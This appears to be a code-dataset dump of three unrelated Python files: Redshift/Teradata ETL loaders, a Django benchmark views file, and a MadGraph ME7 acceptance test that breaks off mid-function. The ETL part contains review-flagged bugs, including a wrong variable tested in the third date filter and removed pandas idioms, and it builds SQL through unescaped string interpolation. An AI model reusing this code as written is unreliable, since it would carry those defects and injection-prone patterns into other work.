                sql = sql.replace(
                    saved_day_id_range_placeholder,
                    f" '{row['start_date']} to {row['end_date']}' as dt_range,"
                )
                sql = sql.replace(
                    sql_loop_fn_dt_placeholder1,
                    f" AND date({filter_day_id_field1}) >= '{row['start_date']}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
                )
                # check for other date fields
                if sql_loop_fn_dt_placeholder2:
                    if filter_id_type2 == "range":
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder2,
                            f" AND date({filter_day_id_field2}) >= '{row['start_date']}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
                        )
                    elif filter_id_type2 == "<":
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder2,
                            f" AND date({filter_day_id_field2}) < '{row['end_date']}'"
                        )
                if sql_loop_fn_dt_placeholder3:
                    # NOTE(review): tests filter_id_type2 but substitutes the
                    # *third* placeholder/field -- likely meant filter_id_type3.
                    if filter_id_type2 == "range":
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder3,
                            f" AND date({filter_day_id_field3}) >= '{row['start_date']}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
                        )
                    elif filter_id_type3 == "<":
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder3,
                            f" AND date({filter_day_id_field3}) < '{row['end_date']}'"
                        )
        # first window with override creates the table; later windows append
        if idx == 0 and override:
            sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
        else:
            sql_prefix = f"INSERT INTO {tgt_tbl} "
        # persist the rendered SQL for audit/debugging
        Export.dump_sql(obj=sql_prefix + sql,
                        dir=log_dir + f"{tgt_tbl}_{idx}.sql")
        try:
            cls.run_query_rs(conn=conn, sql=sql_prefix + sql)
        except Exception as e:
            # a failed monthly insert triggers the weekly fallback below
            print(str(e))
            rptg_freq = "W"
            conn.commit()
            break
    # if the insert failed on a monthly level, cycle down to weekly level
    if rptg_freq == "W":
        print("Insert failed on monthly level...cycling down to weekly")
        # getting max day id value (refresh resume point after partial load)
        try:
            sql = f'''select max(date(trim(substring(dt_range,regexp_instr(dt_range,'to ')+3,10)))) as day_idnt FROM {tgt_tbl}'''
            saved_dates = pd.read_sql_query(sql=sql, con=conn)
        except:
            conn.commit()
            saved_dates = pd.DataFrame({"day_idnt": ["1999-12-31"]})  # arbitrarily old date
        saved_date_dt = \
            datetime(
                year=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[0]),
                month=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[1]),
                day=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[2])
            ).replace(day=1).strftime("%Y-%m-%d")
        rptg_dates_wk = rptg_dates_wk[
            pd.to_datetime(rptg_dates_wk['start_date']) >= \
            pd.to_datetime(saved_date_dt)].reset_index(drop=True)
        for idx, row in rptg_dates_wk.iterrows():
            print(f'''{row['start_date']} to {row['end_date']}''')
            if idx == 0 and saved_dates['day_idnt'][0] != pd.to_datetime(row['start_date']):
                print(Fore.RED + f'''latest saved data date in table is {str(saved_dates['day_idnt'][0])} ...''')
                # bump up start range:
                new_start = str(pd.to_datetime(str(saved_dates['day_idnt'][0])) + pd.DateOffset(1))[:10]
                print(Fore.RED + f'''revising start date to: {new_start} to {row['end_date']}''')
                if sql_loop_fn_type == "fn":
                    sql = sql_loop_fn(src=loop_src1,
                                      src2=loop_src2,
                                      src3=loop_src3,
                                      start=new_start,
                                      end=row['end_date'])
                else:
                    # date range column for logging
                    sql = sql_loop_fn.replace(
                        saved_day_id_range_placeholder,
                        f" '{new_start} to {row['end_date']}' as dt_range,"
                    )
                    sql = sql.replace(
                        sql_loop_fn_dt_placeholder1,
                        f" AND date({filter_day_id_field1}) >= '{new_start}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
                    )
                    # check for other date fields (weekly pass ignores the
                    # range/"<" type switches used by the monthly pass)
                    if sql_loop_fn_dt_placeholder2:
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder2,
                            f" AND date({filter_day_id_field2}) >= '{new_start}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
                        )
                    if sql_loop_fn_dt_placeholder3:
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder3,
                            f" AND date({filter_day_id_field3}) >= '{new_start}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
                        )
            else:
                if sql_loop_fn_type == "fn":
                    sql = sql_loop_fn(
                        start=row['start_date'],
                        end=row['end_date'],
                        src=loop_src1,
                        src2=loop_src2,
                        src3=loop_src3
                    )
                else:
                    # date range column for logging
                    sql = sql_loop_fn.replace(
                        saved_day_id_range_placeholder,
                        f" '{row['start_date']} to {row['end_date']}' as dt_range,"
                    )
                    sql = sql.replace(
                        sql_loop_fn_dt_placeholder1,
                        f" AND date({filter_day_id_field1}) >= '{row['start_date']}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
                    )
                    # check for other date fields
                    if sql_loop_fn_dt_placeholder2:
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder2,
                            f" AND date({filter_day_id_field2}) >= '{row['start_date']}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
                        )
                    if sql_loop_fn_dt_placeholder3:
                        sql = sql.replace(
                            sql_loop_fn_dt_placeholder3,
                            f" AND date({filter_day_id_field3}) >= '{row['start_date']}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
                        )
            if idx == 0 and override:
                sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
            else:
                sql_prefix = f"INSERT INTO {tgt_tbl} "
            Export.dump_sql(obj=sql_prefix + sql,
                            dir=log_dir + f"{tgt_tbl}_{idx}.sql")
            # no try/except here: a weekly-level failure propagates to the caller
            cls.run_query_rs(conn=conn, sql=sql_prefix + sql)
@classmethod
def sequential_load_rs_wk(cls,
                          rptg_dates,
                          override,
                          tgt_tbl,
                          conn,
                          rptg_wk,
                          rptg_wk_start,
                          rptg_wk_end,
                          sql_loop_fn,
                          # filter dates set 1
                          filter_dt_field1=False,
                          filter_dt_type1=False,
                          filter_dt_placeholder1=False,
                          # filter dates set 2
                          filter_dt_field2=False,
                          filter_dt_type2=False,
                          filter_dt_placeholder2=False,
                          # filter dates set 3
                          filter_dt_field3=False,
                          filter_dt_type3=False,
                          filter_dt_placeholder3=False,
                          log_dir=False
                          ):
    """
    Incrementally loads a Redshift table week-by-week from a SQL template.

    For each row of ``rptg_dates`` the template's reporting-week and date-filter
    placeholders are substituted, then the statement runs as CREATE TABLE AS
    (first iteration with ``override``) or INSERT INTO. The loop stops (after
    committing) on the first failed statement.

    :param rptg_dates: DataFrame with 'rptg_wk', 'start_date' and 'end_date' columns.
    :param override: If True, drop and re-create the target table.
    :param tgt_tbl: Target Redshift table name.
    :param conn: Redshift database connection object.
    :param rptg_wk: Placeholder string for the reporting-week column.
    :param rptg_wk_start: Placeholder string for the week-start column.
    :param rptg_wk_end: Placeholder string for the week-end column.
    :param sql_loop_fn: SQL template string containing the placeholders.
    :param filter_dt_field1: Column name for the first date filter.
    :param filter_dt_type1: Unused; kept for signature compatibility.
    :param filter_dt_placeholder1: Placeholder string for the first date filter.
    :param filter_dt_field2: Column name for the second date filter.
    :param filter_dt_type2: "range" or "<=" behavior for the second filter.
    :param filter_dt_placeholder2: Placeholder string for the second date filter.
    :param filter_dt_field3: Column name for the third date filter.
    :param filter_dt_type3: "range" or "<=" behavior for the third filter.
    :param filter_dt_placeholder3: Placeholder string for the third date filter.
    :param log_dir: Directory prefix where each generated SQL statement is dumped.
    :return: None.
    """
    # dropping table if override = True
    if override:
        print(f'''table override True: Dropping table: {tgt_tbl} ''')
        try:
            cls.run_query_rs(conn=conn, sql=f'''drop table {tgt_tbl}''')
        except Exception:
            # the table may not exist yet; commit clears the aborted transaction
            conn.commit()
    for idx, row in rptg_dates.iterrows():
        print(f'''{row['start_date']} to {row['end_date']}''')
        # stamp the reporting week / start / end logging columns into the template
        sql = sql_loop_fn.replace(
            rptg_wk,
            f" '{row['rptg_wk']}' as rptg_wk,"
        )
        sql = sql.replace(
            rptg_wk_start,
            f" '{row['start_date']}' as rptg_wk_start,"
        )
        sql = sql.replace(
            rptg_wk_end,
            f" '{row['end_date']}' as rptg_wk_end,"
        )
        # primary date filter: (start_date, end_date] window
        sql = sql.replace(
            filter_dt_placeholder1,
            f" AND date({filter_dt_field1}) > '{row['start_date']}' "
            f" AND date({filter_dt_field1}) <= '{row['end_date']}'"
        )
        # optional secondary date filter
        if filter_dt_placeholder2:
            if filter_dt_type2 == "range":
                sql = sql.replace(
                    filter_dt_placeholder2,
                    f" AND date({filter_dt_field2}) > '{row['start_date']}' "
                    f" AND date({filter_dt_field2}) <= '{row['end_date']}'"
                )
            elif filter_dt_type2 == "<=":
                sql = sql.replace(
                    filter_dt_placeholder2,
                    f" AND date({filter_dt_field2}) <= '{row['end_date']}'"
                )
        # optional tertiary date filter
        if filter_dt_placeholder3:
            if filter_dt_type3 == "range":
                sql = sql.replace(
                    filter_dt_placeholder3,
                    f" AND date({filter_dt_field3}) > '{row['start_date']}' "
                    f" AND date({filter_dt_field3}) <= '{row['end_date']}'"
                )
            elif filter_dt_type3 == "<=":
                sql = sql.replace(
                    filter_dt_placeholder3,
                    f" AND date({filter_dt_field3}) <= '{row['end_date']}'"
                )
        # first iteration with override creates the table; later ones append
        if idx == 0 and override:
            sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
        else:
            sql_prefix = f"INSERT INTO {tgt_tbl} "
        # persist the rendered SQL for audit/debugging
        Export.dump_sql(obj=sql_prefix + sql,
                        dir=log_dir + f"{tgt_tbl}_{idx}.sql")
        try:
            cls.run_query_rs(conn=conn, sql=sql_prefix + sql)
        except Exception as e:
            # surface the error, clear the transaction, and stop the load
            print(str(e))
            conn.commit()
            break
class Teradata:
    """
    Generic functions for Teradata SQL queries and ETL.
    .. image:: ../images_source/db_etl_tools/teradata.png
    """

    @classmethod
    def insert_td(cls, tbl, df, conn, batch_size=False, date_cols=False):
        """
        Executes an INSERT INTO statement for a given Pandas DataFrame.

        :param tbl: Teradata table name.
        :param df: Pandas DataFrame.
        :param conn: Teradata connection object.
        :param batch_size: Records to load per batch (defaults to 10000 when falsy).
        :param date_cols: A list of date columns to convert to Pandas datetime.
        :return: None. Printed SQL statements for each step.
        """
        print(f"batch size: {batch_size}")
        # guard: only DataFrames are supported
        if type(df) != type(pd.DataFrame()):
            print("Detected something other than a DataFrame\n Please use a pandas DataFrame")
            raise TypeError('Unsupported object type!')
        if date_cols:
            # Convert columns to a date object for loading
            # TD is picky, and wants 'YYYY-MM-DD' dates
            print(' ...Attempting to convert elligible columns to date')
            # NOTE(review): errors='ignore' is deprecated in recent pandas --
            # confirm the pinned pandas version supports it.
            for idx, column in enumerate(date_cols):
                df[column] = pd.to_datetime(df[column], errors='ignore')
            date_columns = list(df.select_dtypes(include=[np.datetime64]).columns)
            print(f" {len(date_columns)} date column(s) found")
            for column in date_columns:
                df[column] = df[column].dt.strftime('%Y-%m-%d')
        # one '?' bind parameter per DataFrame column
        sql_vars = ('?, ' * (len(df.columns) - 1)) + '?'
        sql = f"insert into {tbl} values({sql_vars})"
        data = df
        print(" ...Beginning bulk insert operation")
        if not batch_size:
            batch_size = 10000
        try:
            print(f"{len(range(0, int(np.floor(df.shape[0] / batch_size) + 1)))} batches found")
            for i in range(0, int(np.floor(df.shape[0] / batch_size) + 1)):
                # slice one batch of rows out as tuples for executemany
                data_sample = [tuple(x) for x in data.iloc[batch_size * i:batch_size * (i + 1), :].values]
                conn.executemany(sql, data_sample, batch=True)
                print(sql)
                print(f" ...Completed batch {i} of {len(range(0, int(np.floor(df.shape[0] / batch_size) + 1)))}")
        except Exception as e:
            # show the head of the data to help debug the failing batch
            print(data.head())
            raise e
        print(' ...Successfully loaded Data into Teradata')
        return None

    @classmethod
    def run_query_td(cls, conn, sql):
        """
        Executes a SQL statement with a Teradata database connection.

        :param conn: Teradata database connection object.
        :param sql: SQL statement to execute.
        :return: None. Prints the elapsed runtime in minutes.
        """
        rptg_tstart = datetime.now()
        conn.execute(sql)
        rptg_tend = datetime.now()
        tdelta = rptg_tend - rptg_tstart
        tdelta = tdelta.total_seconds() / 60
        print(Fore.RED + f"Runtime: {tdelta}")

    @classmethod
    def make_tbl_td(cls, df, tbl_name):
        """
        Creates SQL to run a CREATE TABLE statement based on a Pandas DataFrame.

        Column types are inferred from the DataFrame dtypes; VARCHAR lengths
        come from the longest string per column, and INTEGER columns whose max
        exceeds the 32-bit range are downgraded to VARCHAR.

        :param df: Pandas DataFrame.
        :param tbl_name: Teradata table name.
        :return: CREATE TABLE SQL statement (string).
        """
        # fix columns (normalize names for the database)
        df = cls.make_db_cols(df)
        # loop thru the columns
        for idx, col in enumerate(df):
            # find the max length of each field
            col_desc = col + "-" + str(df[col].map(lambda x: len(str(x))).max())
            # find the max value of each fields
            try:
                col_max = col + "-" + str(max(df[col]))
            except:
                # non-comparable column contents: record 'NA' as the max
                col_max = col + "-" + 'NA'
            if idx == 0:
                col_desc_all = [col_desc]
                col_max_all = [col_max]
            else:
                col_desc_all.append(col_desc)
                col_max_all.append(col_max)
        # make df of column lengths
        col_desc_all = pd.DataFrame(col_desc_all)
        col_desc_all.columns = ["char"]
        # NOTE(review): the `.str` tuple-unpacking idiom below was removed in
        # pandas 1.0 -- this method appears to require an older pandas; confirm
        # the pinned version.
        col_desc_all['column'], col_desc_all['length'] = \
            col_desc_all['char'].str.split('-', 1).str
        # make df of column max
        col_max_all = pd.DataFrame(col_max_all)
        col_max_all.columns = ["char"]
        col_max_all['column'], col_max_all['max'] = \
            col_max_all['char'].str.split('-', 1).str
        # make df of column dtypes
        col_desc_types = pd.DataFrame(df.dtypes).reset_index()
        col_desc_types.columns = ["column", "type"]
        # join dfs
        col_desc_all = pd.merge(
            col_desc_all,
            col_desc_types,
            how="inner",
            on="column")
        col_desc_all = pd.merge(
            col_desc_all,
            col_max_all[["column", "max"]],
            how="inner",
            on="column")
        # define data type mapping (pandas --> teradata)
        d = {'object': 'VARCHAR',
             'int64': 'INTEGER',
             "Int64": "INTEGER",
             'int32': 'INTEGER',
             'bool': 'VARCHAR',
             'float64': 'FLOAT',
             'datetime64[ns]': 'DATE'}
        col_desc_all = col_desc_all.replace(d)
        # list the columns where you want to specify the lengths
        col_desc_all['concat'] = np.where(
            # if varchar, use the length of the longest char
            col_desc_all['type'] == "VARCHAR",
            col_desc_all['column'] + " " + \
            col_desc_all['type'].astype(str) + \
            "(" + col_desc_all['length'] + ")",
            col_desc_all['column'] + " " + \
            col_desc_all['type'].astype(str))
        # convert integers with a max val over certain amount to varchar
        # (2147483647 is the 32-bit INTEGER ceiling)
        for idx, row in col_desc_all.iterrows():
            if str(row['type']) == 'INTEGER' and row['max'] != "nan" and int(row['max']) > 2147483647:
                val = row['concat']
                col_desc_all.loc[idx, 'concat'] = \
                    val.replace(
                        " INTEGER",
                        f" VARCHAR({row['length']})")
        # collapse each per-column "<name> <type>" fragment into one CSV string
        col_desc_all = col_desc_all.apply(', '.join).reset_index()
        col_desc_all.columns = ["index", "statement"]
        statement = col_desc_all[col_desc_all['index'] == 'concat']
        sql = statement['statement'].values
        # strip the numpy-array formatting from the string representation
        sql = str(sql)
        sql = sql.replace("[", "")
        sql = sql.replace("]", "")
        sql = "CREATE TABLE " + tbl_name + " ( " + sql + " )"
        sql = sql.replace("'", "")
        return sql

    @classmethod
    def make_tbl_complete_td(cls, df, tbl_name, conn, batch_size=False):
        """
        Executes a series of SQL statements to CREATE and INSERT into a table from a Pandas DataFrame.

        :param df: Pandas DataFrame to create a table from.
        :param tbl_name: Name of table to be created.
        :param conn: Teradata database connection object.
        :param batch_size: Records to load per batch.
        :return: None. Prints the elapsed insert time in minutes.
        """
        # 1 drop the table (best-effort: it may not exist yet)
        print(f"dropping table: {tbl_name}")
        try:
            cls.run_query_td(sql=f"drop table {tbl_name}", conn=conn)
        except:
            print(f"table doesn't exist: {tbl_name}")
            pass
        # create the table from the DataFrame's inferred schema
        print(f"creating table: {tbl_name}")
        sql = cls.make_tbl_td(df=df, tbl_name=tbl_name)
        print(sql)
        cls.run_query_td(sql=sql, conn=conn)
        # insert the DataFrame rows and report timing
        print(f"inserting DF values into table: {tbl_name}")
        rptg_tstart = datetime.now()
        cls.insert_td(df=df, tbl=tbl_name, conn=conn, batch_size=batch_size)
        rptg_tend = datetime.now()
        tdelta = rptg_tend - rptg_tstart
        tdelta = tdelta.total_seconds() / 60
        print(Fore.RED + f"Runtime: {tdelta}")
| 38.668269
| 148
| 0.494117
| 9,902
| 88,473
| 4.167239
| 0.051101
| 0.022392
| 0.026173
| 0.015995
| 0.87483
| 0.86109
| 0.851154
| 0.840321
| 0.830312
| 0.825441
| 0
| 0.013417
| 0.393431
| 88,473
| 2,287
| 149
| 38.685177
| 0.755502
| 0.174573
| 0
| 0.803776
| 0
| 0.012138
| 0.178072
| 0.042923
| 0.000674
| 0
| 0
| 0
| 0
| 1
| 0.022927
| false
| 0.006069
| 0.008092
| 0
| 0.045853
| 0.047876
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a8bef16ac4e836c485ded3cc83ef19a8b845b1ad
| 2,058
|
py
|
Python
|
passe-sample-apps/benchmarking/benchapp/views.py
|
kantai/passe-framework-prototype
|
51a441b689c54cfd57748129f77fde3c7a08e5c3
|
[
"BSD-3-Clause"
] | 3
|
2016-07-06T16:34:38.000Z
|
2021-02-10T08:06:23.000Z
|
passe-sample-apps/benchmarking/benchapp/views.py
|
kantai/passe-framework-prototype
|
51a441b689c54cfd57748129f77fde3c7a08e5c3
|
[
"BSD-3-Clause"
] | null | null | null |
passe-sample-apps/benchmarking/benchapp/views.py
|
kantai/passe-framework-prototype
|
51a441b689c54cfd57748129f77fde3c7a08e5c3
|
[
"BSD-3-Clause"
] | 2
|
2020-06-22T20:55:48.000Z
|
2021-01-15T18:01:04.000Z
|
# Create your views here.
from django.http import HttpResponse
from benchmarking.benchapp.models import Foo
def _poll_index(count):
    """Run `count` identical Foo lookups and return the standard response.

    Each lookup's result count is concatenated into the echoed string, exactly
    as the original copy-pasted benchmark views did.
    """
    tally = "".join(
        str(len(Foo.objects.filter(databar=""))) for _ in range(count)
    )
    return HttpResponse("Hello, world. You're at the poll index %s." % tally)


def i0(request):
    """Baseline benchmark view: no database work at all."""
    return HttpResponse("Hello, world. You're at the poll index %s." % 1)


def i1(request):
    """Benchmark view performing 1 Foo query."""
    return _poll_index(1)


def i2(request):
    """Benchmark view performing 2 Foo queries."""
    return _poll_index(2)


def i3(request):
    """Benchmark view performing 3 Foo queries."""
    return _poll_index(3)


def i4(request):
    """Benchmark view performing 4 Foo queries."""
    return _poll_index(4)


def i5(request):
    """Benchmark view performing 5 Foo queries."""
    return _poll_index(5)


def i6(request):
    """Benchmark view performing 6 Foo queries."""
    return _poll_index(6)


def i7(request):
    """Benchmark view performing 7 Foo queries."""
    return _poll_index(7)


def i8(request):
    """Benchmark view performing 8 Foo queries."""
    return _poll_index(8)


def i9(request):
    """Benchmark view performing 9 Foo queries."""
    return _poll_index(9)


def i10(request):
    """Benchmark view performing 10 Foo queries."""
    return _poll_index(10)
| 34.881356
| 77
| 0.584548
| 320
| 2,058
| 3.759375
| 0.178125
| 0.164589
| 0.210308
| 0.256027
| 0.885287
| 0.885287
| 0.885287
| 0.719036
| 0.719036
| 0.719036
| 0
| 0.021921
| 0.246356
| 2,058
| 58
| 78
| 35.482759
| 0.753707
| 0.011176
| 0
| 0.555556
| 0
| 0
| 0.22725
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.203704
| false
| 0
| 0.037037
| 0.018519
| 0.444444
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a8c71b480b790d5f56e12edbb0b5534670984fe2
| 28,861
|
py
|
Python
|
tests/acceptance_tests/test_ME7.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 1
|
2019-12-14T15:25:38.000Z
|
2019-12-14T15:25:38.000Z
|
tests/acceptance_tests/test_ME7.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 26
|
2018-10-08T15:49:32.000Z
|
2020-05-15T13:33:36.000Z
|
tests/acceptance_tests/test_ME7.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 2
|
2019-03-25T17:28:48.000Z
|
2021-04-21T12:15:53.000Z
|
################################################################################
#
# Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors
#
# This file is a part of the MadGraph5_aMC@NLO project, an application which
# automatically generates Feynman diagrams and matrix elements for arbitrary
# high-energy processes in the Standard Model and beyond.
#
# It is subject to the MadGraph5_aMC@NLO license which should accompany this
# distribution.
#
# For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch
#
################################################################################
import subprocess
import unittest
import os
import re
import shutil
import sys
import logging
import random
import timeit
# Shorthand used throughout this module for building filesystem paths.
pjoin = os.path.join
logger = logging.getLogger('test_ME7')
import tests.unit_tests.iolibs.test_file_writers as test_file_writers
import madgraph.interface.master_interface as Cmd
import madgraph.interface.ME7_interface as ME7_interface
import madgraph.integrator.ME7_integrands as ME7_integrands
from madgraph.core.accessors import ProcessKey
import madgraph.various.misc as misc
# Location of this test file and of its pickled input fixtures.
_file_path = os.path.dirname(os.path.realpath(__file__))
_pickle_path =os.path.join(_file_path, 'input_files')
from madgraph import MG4DIR, MG5DIR, MadGraph5Error, InvalidCmd
# Messages shown when the tests run with debugging=True (process output reuse).
debugging_warning = ' /!\ USE ONLY FOR DEBUGGING /!\ '
debugging_written = 'Output for %s written at %s'
debugging_reused = 'Reusing output for %s written at %s'
def get_test_IR_limit_cmd(options):
    """Render a 'test_IR_limits' command line from an option mapping.

    A key mapped to None becomes a bare flag ('--key'); any other value is
    rendered as '--key=value'. Options appear in mapping order.
    """
    rendered = []
    for name, val in options.items():
        if val is None:
            rendered.append('--%s' % name)
        else:
            rendered.append('--%s=%s' % (name, val))
    return 'test_IR_limits ' + ' '.join(rendered)
#===============================================================================
# TestME7 colorful output for e+ e- > j j j @NLO
#===============================================================================
class TestME7_NLO_colorful_epem_jjj(unittest.TestCase):
    """This test validates the command 'test_IR_limits' of ME7 in the colorful scheme
    as well as integrand calls for the process e+ e- > j j j --NLO=QCD"""

    # If the debug mode is set to True, then the process output is not refreshed
    # but reused instead
    debugging = False
    # Class-level flag so the expensive process generation runs only once
    # across all test methods of this class.
    is_process_generated = False

    def setUp(self):
        """Generate (or reuse) the process output and attach an ME7 interface."""
        self.tmp_process_dir = pjoin(_file_path, 'TMP_TestME7_colorful_epem_jjj_output')
        # Generate the process output if it does not exist yet or if we
        # are not in debug mode.
        if os.path.isdir(self.tmp_process_dir):
            if not self.is_process_generated and not self.debugging:
                shutil.rmtree(self.tmp_process_dir)
            else:
                # an existing directory counts as already generated
                TestME7_NLO_colorful_epem_jjj.is_process_generated = True
        if not self.is_process_generated:
            self.cmd = Cmd.MasterCmd()
            if os.path.isdir(self.tmp_process_dir):
                shutil.rmtree(self.tmp_process_dir)
            # Now generate and output a process, so as to run ME7 commands on it
            self.do('import model loop_sm')
            self.do('set subtraction_scheme colorful')
            self.do('generate e+ e- > j j j --NLO=QCD')
            self.do('output %s' % self.tmp_process_dir)
            TestME7_NLO_colorful_epem_jjj.is_process_generated = True
            if self.debugging:
                misc.sprint(debugging_warning)
                misc.sprint(
                    debugging_written % (self.__class__.__name__, self.tmp_process_dir))
        else:
            if self.debugging:
                misc.sprint(debugging_warning)
                misc.sprint(
                    debugging_reused % (self.__class__.__name__, self.tmp_process_dir))
        # Now initialize an ME7 interface on the above process output
        self.cmd = ME7_interface.MadEvent7Cmd(me_dir=self.tmp_process_dir)
        self.cmd.no_notification()

    def __del__(self):
        # Clean up the generated process directory unless debugging keeps it
        # around for reuse.
        if os.path.isdir(self.tmp_process_dir) and not self.debugging:
            shutil.rmtree(self.tmp_process_dir)

    def do(self, line):
        """ exec a line in the cmd under test """
        self.cmd.exec_cmd(line)

    def verify_ME7_test_results(self, results_file):
        """Parse and verify that all tests output in 'results_file_path' are passed."""
        full_path = pjoin(self.tmp_process_dir, results_file)
        # NOTE(review): a trailing newline in the results file would produce an
        # empty final line and fail the 4-way unpack below -- confirm the file
        # is written without one.
        for line in open(full_path,'r').read().split('\n'):
            process, limit, outcome, ratio = line.split('|')[:4]
            self.assertTrue(outcome.strip()=='PASSED', line)

    def test_ME7_colorful_ggqqx_collinear_limits(self):
        """Check all pure-collinear IR limits for e+ e- > g g d d~ at NLO."""
        options = {'correction_order' : 'NLO',
                   'limits' : 'purecollinear',
                   'counterterms' : 'all',
                   'process' : 'e+ e- > g g d d~',
                   'show_plots' : False,
                   'save_plots' : False,
                   'seed' : 666,
                   'n_steps' : 10,
                   'min_scaling_variable' : 1.0e-7,
                   'acceptance_threshold' : 5.0e-3,
                   'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
                   }
        self.do(get_test_IR_limit_cmd(options))
        self.verify_ME7_test_results(options['save_results_to_path'])

    def test_ME7_colorful_ggqqx_soft_limits(self):
        """Check all pure-soft IR limits for e+ e- > g g d d~ at NLO."""
        options = {'correction_order' : 'NLO',
                   'limits' : 'puresoft',
                   'counterterms' : 'all',
                   'process' : 'e+ e- > g g d d~',
                   'show_plots' : False,
                   'save_plots' : False,
                   'seed' : 666,
                   'n_steps' : 10,
                   'min_scaling_variable' : 1.0e-11,
                   'acceptance_threshold' : 1.0e-5,
                   'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
                   }
        self.do(get_test_IR_limit_cmd(options))
        self.verify_ME7_test_results(options['save_results_to_path'])

    def test_ME7_colorful_ggqqx_softcollinear_limits(self):
        """Check the soft-collinear IR limits (regex-selected) for e+ e- > g g d d~."""
        # the 'limits' value is itself a raw-string literal passed through to
        # the test_IR_limits command line, where it is interpreted as a regex
        options = {'correction_order' : 'NLO',
                   'limits' : "r'^\(C\(S.*$'",
                   'counterterms' : 'all',
                   'process' : 'e+ e- > g g d d~',
                   'show_plots' : False,
                   'save_plots' : False,
                   'seed' : 666,
                   'n_steps' : 20,
                   'min_scaling_variable' : 1.0e-12,
                   'acceptance_threshold' : 1.0e-2,
                   'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
                   }
        self.do(get_test_IR_limit_cmd(options))
        self.verify_ME7_test_results(options['save_results_to_path'])

    def test_ME7_colorful_qqxqqx_collinear_limits(self):
        """Check all collinear IR limits for e+ e- > d d~ d d~ at NLO."""
        options = {'correction_order' : 'NLO',
                   'limits' : 'collinear',
                   'counterterms' : 'all',
                   'process' : 'e+ e- > d d~ d d~',
                   'show_plots' : False,
                   'save_plots' : False,
                   'seed' : 666,
                   'n_steps' : 10,
                   'min_scaling_variable' : 1.0e-7,
                   'acceptance_threshold' : 5.0e-4,
                   'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
                   }
        self.do(get_test_IR_limit_cmd(options))
        self.verify_ME7_test_results(options['save_results_to_path'])

    def test_ME7_born_integrand_call(self):
        """Check the result of a single call to the born integrand_call."""
        born_integrand = self.cmd.all_integrands.get_integrands_of_type(
            ME7_integrands.ME7Integrand_B)[0]
        dimensions = born_integrand.get_dimensions()
        def call():
            born_integrand(
                dimensions.get_continuous_dimensions().random_sample(),
                dimensions.get_discrete_dimensions().random_sample(),
                cache_active=True )
        n_calls = 1000
        # time the integrand with logging silenced; timing is ms per call
        with ME7_interface.ME7RunEnvironment(silence=True, loggers=logging.CRITICAL ):
            timing = [
                1.e3*(res/float(n_calls))
                for i, res in enumerate(timeit.repeat(call, number=n_calls, repeat=2)) ]
        # NOTE(review): `res` is built but never used in the assertion message below
        res = '\n'+'\n'.join('%d : %g ms'%(i+1, res) for i, res in enumerate(timing))
        self.assertTrue(
            (timing[0] < 50.0),
            'Born integrand call too slow: %g ms'%(timing[0]) )

    def test_ME7_real_integrand_call(self):
        """Check the result of a single call to the real integrand_call."""
        real_integrand = self.cmd.all_integrands.get_integrands_of_type(
            ME7_integrands.ME7Integrand_R)[0]
        dimensions = real_integrand.get_dimensions()
        def call():
            real_integrand(
                dimensions.get_continuous_dimensions().random_sample(),
                dimensions.get_discrete_dimensions().random_sample(),
                cache_active=False )
        n_calls = 100
        with ME7_interface.ME7RunEnvironment(silence=True, loggers=logging.CRITICAL):
            timing = [
                1.e3*(res/float(n_calls))
                for i, res in enumerate(timeit.repeat(call, number=n_calls, repeat=2)) ]
        # NOTE(review): `res` is built but never used in the assertion message below
        res = '\n'+'\n'.join('%d : %g ms'%(i+1, res) for i, res in enumerate(timing))
        self.assertTrue(
            (timing[0] < 500.0),
            'Real integrand call too slow: %g ms'%(timing[0]) )

    def test_ME7_virtual_integrand_call(self):
        """Check the result of a single call to the virtual integrand_call."""
        virtual_integrand = self.cmd.all_integrands.get_integrands_of_type(
            ME7_integrands.ME7Integrand_V)[0]
        dimensions = virtual_integrand.get_dimensions()
        def call():
            virtual_integrand(
                dimensions.get_continuous_dimensions().random_sample(),
                dimensions.get_discrete_dimensions().random_sample(),
                cache_active=False )
        n_calls = 100
